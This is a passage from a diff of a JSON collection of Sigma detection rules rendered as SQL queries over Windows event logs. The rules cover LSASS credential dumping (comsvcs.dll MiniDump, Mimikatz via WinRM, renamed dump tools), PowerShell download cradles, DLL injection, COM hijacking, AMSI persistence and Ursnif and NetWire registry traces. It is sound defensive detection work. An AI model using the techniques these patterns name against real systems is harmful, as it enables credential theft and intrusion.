System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir 
Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", 
- "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + 
"filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", - "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the process injection of a LittleCorporal 
generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate testing of Microsoft UI parts." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k 
netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools. 
Filter the legitimate paths used in your environnement" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND 
TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "status": "experimental", - "description": "Detects execution 
of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + ], + "filename": "registry_add_persistence_com_key_linking.yml" + }, + { + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", + "tags": [ + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject 
LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName 